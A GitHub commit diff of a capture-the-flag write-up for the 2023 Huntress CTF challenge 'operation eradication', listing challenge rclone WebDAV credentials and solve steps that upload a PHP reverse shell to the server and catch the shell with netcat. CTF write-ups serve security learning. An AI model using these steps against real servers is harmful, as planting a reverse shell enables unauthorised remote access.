Skip to content

Commit

Permalink
Update writeup.md
Browse files Browse the repository at this point in the history
  • Loading branch information
54toshi authored Oct 20, 2023
1 parent 10b3c0b commit 65da6d8
Showing 1 changed file with 7 additions and 3 deletions.
10 changes: 7 additions & 3 deletions 2023_huntress_ctf/operation_eradication/writeup.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,15 +7,16 @@ Oh no! A ransomware operator encrypted an environment, and exfiltrated data that
Luckily, we found what looks like a configuration file, that seems to have credentials to the actor's storage server... but it doesn't seem to work. Can you get onto their server and delete all the data they stole!?

with that you get some credentials:
```
type = webdav
url = http://localhost/webdav
vendor = other
user = VAHycYhK2aw9TNFGSpMf1b_2ZNnZuANcI8-26awGLYkwRzJwP_buNsZ1eQwRkmjQmVzxMe5r
pass = HOUg3Z2KV2xlQpUfj6CYLLqCspvexpRXU9v8EGBFHq543ySEoZE9YSdH7t8je5rWfBIIMS-5

```
## how to solve

1. the credentials are for rclone
the credentials are for rclone

```bash
# get the path to rclone config
Expand All @@ -38,4 +39,7 @@ cat php-reverse-shell.php

# now on the server with netcat a shell should pop up
# the flag is in /var/www/html/index.php
```
```

## resources
https://rclone.org/docs/

0 comments on commit 65da6d8

Please sign in to comment.